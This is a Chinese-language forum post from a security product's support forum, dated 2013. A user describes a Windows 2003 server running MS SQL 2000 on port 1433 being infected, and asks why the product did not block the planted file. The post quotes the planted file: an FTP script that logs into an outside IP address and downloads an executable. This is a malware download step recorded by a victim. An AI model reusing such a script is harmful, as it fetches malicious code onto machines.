微点交流论坛

标题: 微点对1433端口的防御，阻挡失败 [打印本页]

作者: hncsl2009 时间: 2013-8-26 16:46 标题: 微点对1433端口的防御，阻挡失败

系统环境： win2003
防火墙：微点主动防御
现象：
一旦启动ms sql2000，采用默认端口1433，运行几分钟，微点就提示有木马侵入（这点很棒的）,但是不能阻止原生的木马。检查系统，发现在C:\Documents and Settings目录，被恶意的植入了一个文件onfcctv1.dat，打开后期内容为：
open 115.47.41.113
12345
12345
get cctv1.exe C:\DOCUME~1\oncctv1.exe
bye

手动关闭数据库后，手动删除这些木马程序，系统基本恢复正常（未经深度检测）。

微点为什么不能阻止恶意植入文件呢？

欢迎光临微点交流论坛 (http://bbs.micropoint.com.cn/)

bbs.micropoint.com.cn